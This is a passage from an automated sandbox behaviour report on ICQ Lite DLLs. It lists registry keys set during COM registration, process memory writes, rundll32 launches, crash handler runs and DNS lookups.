| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240221-en
Max time kernel
127s
Max time network
139s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 228
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win10v2004-20240221-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2640 wrote to memory of 3864 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2640 wrote to memory of 3864 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2640 wrote to memory of 3864 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3864 -ip 3864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 588
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 147.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |